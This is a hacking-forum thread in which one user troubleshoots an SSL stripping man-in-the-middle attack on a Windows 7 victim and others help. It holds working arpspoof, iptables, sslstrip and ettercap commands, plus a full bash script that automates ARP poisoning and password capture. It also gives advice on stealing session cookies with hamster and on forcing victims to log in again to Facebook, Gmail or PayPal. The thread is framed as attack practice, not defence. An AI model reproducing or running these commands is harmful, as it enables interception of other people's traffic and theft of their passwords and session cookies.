iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
[help] Got strucked in last step of ssl stripping
  • mandi
    Posts: 207
    Here is the scenaario

    my back-track ip(i am using backtrack 4 inside vmware)-- 192.168.12.37
    victim ip(windows 7) 192.168.12.40
    default gateway 192.168.1.4(windows 2003 server)

    sub-net mask for all ip's 255.255.240.0


    first i fired up a shell
    and typed


    echo 1 > /proc/sys/net/ipv4/ip_forward


    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


    opened another shell

    arpspoof -i eth0 -t 192.168.12.40 192.168.1.4


    step 3:

    start--->backtrack--->privilegeescalation--->all--->spoofing-->ssl strip

    opened the tool and then i typed

    sslstrip -a


    opened another shell typed

    ettertcap -T -q -i -eth0

    i am getting errors instead of sucess :(


    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

    Listening on -eth0...
    ERROR : 19, No such device
    [ec_capture.c:capture_init:146]

     pcap_open: SIOCGIFHWADDR: No such device



    i don't know what is wrong at the last step?

    how to rectify this error?

    can some one help me?
  • Sh3llc0d3
    Posts: 1,910
    By the looks of it your having possibly a similar problem to Xinapse... can you do me the honor of posting the output of "ifconfig".
  • mandi
    Posts: 207
    here it is mate

    eth0      Link encap:Ethernet  HWaddr 00:0c:29:9f:6d:1f
              inet addr:192.168.12.37  Bcast:192.168.15.255  Mask:255.255.240.0
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:72 errors:0 dropped:0 overruns:0 frame:0
              TX packets:33 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:6624 (6.6 KB)  TX bytes:1386 (1.3 KB)
              Interrupt:19 Base address:0x2024

    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:28 errors:0 dropped:0 overruns:0 frame:0
              TX packets:28 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:3136 (3.1 KB)  TX bytes:3136 (3.1 KB)
  • chroniccommand
    Posts: 1,389
    said:


    here it is mate


    eth0      Link encap:Ethernet  HWaddr 00:0c:29:9f:6d:1f
              inet addr:192.168.12.37  Bcast:192.168.15.255  Mask:255.255.240.0
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:72 errors:0 dropped:0 overruns:0 frame:0
              TX packets:33 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:6624 (6.6 KB)  TX bytes:1386 (1.3 KB)
              Interrupt:19 Base address:0x2024

    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:28 errors:0 dropped:0 overruns:0 frame:0
              TX packets:28 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:3136 (3.1 KB)  TX bytes:3136 (3.1 KB)




    Hm I think It's a problem with the virtual box. It's set as eth0 which is wired connection. Try playing around with the settings in the VBox and see if you can change that. What virtual box program do you use?
  • Sh3llc0d3
    Posts: 1,910
    >>>>DURRRR

    Check your ettercap command it should be "-i eth0" don't add an extra - before eth0 like youe have "-i -eth0"

    -i specifies the interface
  • mandi
    Posts: 207
    will give a try and let u know,between i didn't get any error in the ettercap command,i did as per in the backtrack tutorials video...
  • Sh3llc0d3
    Posts: 1,910
    Yeah just try:

    ettertcap -T -q -i eth0

    Instead of

    ettertcap -T -q -i -eth0
  • mandi
    Posts: 207
    Also i got another suggestion from a hf member like this,
    he said we never need etter cap in the ssl stripping and he also suggest me to do like this

    sslstrip -l 10000 and adviced me not to use ettercap ,and he says all the plain text will be available in the log....

    i am not that much good in linux,so i want to hear your advice mate....
  • Sh3llc0d3
    Posts: 1,910
    For your purposes above, your using arpspoof to perform arp cache poisoning, and then you should run sslstrip after that. Ettercap in this case is not needed, you'd use it instead of arpspoof.

    Check out my MITM/sniffing tutorials in the network sec section and it'll give you the ettercap wya of doing it instead of arpspoof if you want to see the difference.
  • fobos
    Posts: 5
    hello to all. Lets take it from the beginning...

    You need ettercap, arpspoof, sslstrip, konsole. (you don't need but its good to have) iptables and hamster.

    1. you connect to the network you want to attack
    2. you seek for your victims
    3. you sniff the connections

    keep in mind not to alter /etc/etter.conf
    Use hamster
    You always look the stolen cookies

    run the script

    #!/bin/bash 
    clear 
    echo "Hello $USER!" 
    echo "Welcome to the SSL sniffing script" 
    clear 
    echo "What's the interface you'll be using? [eth0]" 
    read iface 
    if [ "$iface" = "" ] 
    then 
    iface="eth0" 
    fi 
    clear 
    echo "What's the target's IP?" 
    read tip 
    clear 
    echo "What's the target's gateway? [192.168.1.1]" 
    read tdg 
    if [ "$tdg" = "" ] 
    then 
    tdg="192.168.1.1" 
    fi 
    clear 
    echo "The selected interface is $iface" 
    echo "The target IP is $tip" 
    echo "The target gateway is $tdg" 
    echo "I'm ready to run the script." 
    echo "Are you sure you want to run it [y/n]?" 
    read yn 
    if [ "$yn" != "y" ] 
    then 
    echo "Exiting..." 
    echo "Have a nice day :)" 
    exit 0 
    fi 
    clear 
    echo "Running..." 
    echo 1 > /proc/sys/net/ipv4/ip_forward 
    konsole -e arpspoof -i $iface -t $tip $tdg & 
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 
    konsole -e  sslstrip -a -k -f -l 10000 & 
    clear 
    echo "Running ettercap" 
    ettercap -T -q -u -i $iface 
    clear 
    echo "All cleaned up." 
    echo "Have a nice day :)"

    while you see the cookies connect to the website (facebook, gmail, paypal etc) and you press disconnect.

    This will make the victim login again. ;)
    He want get a false certificate this time...


    basic commands

    echo 1 > /proc/sys/net/ipv4/ip_forward
    konsole -e arpspoof -i $iface -t $tip $tdg

    you pretend to be the router so everything passes from you
    -iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    -konsole -e  sslstrip -a -k -f -l 10000

    (sslstrip - when the victim tries to create a secure connection sslstrip understands it and as it works like a proxie it creates a connection to the website but not a secure one.

    sslstrip works so collect the passwords with ettercap...

    -ettercap -T -q -u -i $iface (unoffensive mode)

    -[eof]-

    ps: you can use ettercap and not arpspoof (the problem here is that you get double packets) with the command
    ettercap -qT -M arp:remote -i $ifname // //
    for specific target and gateway..
    ettercap -qT -M arp:remote -i $ifname /$tdg/ /$tip/

    you can also do a route -n

    ifname=`route -n | grep 0.0.0.0 | grep UG | awk '{print $NF}'` 
    tdg=`route -n | grep UG | grep $ifname | awk '{print $2}'`


    excuse my english...

    thats all folks.
  • Sh3llc0d3
    Posts: 1,910
    Nice scripts, however I prefer to do it manually :). Mandi's original problem was a simple incorrect spelling the tutorial was correct....

    Also, not sure if you mean never alter etter.conf but to perform certain attacks in ettercap you have to.

    Welcome to the forum anyway fobos :)
  • fobos
    Posts: 5
    i said it because sometimes you have to disable/enable port forward etc in etter.conf :)
  • Corrosion
    Posts: 121
    Drop ettercap and use arpspoof
Add a Comment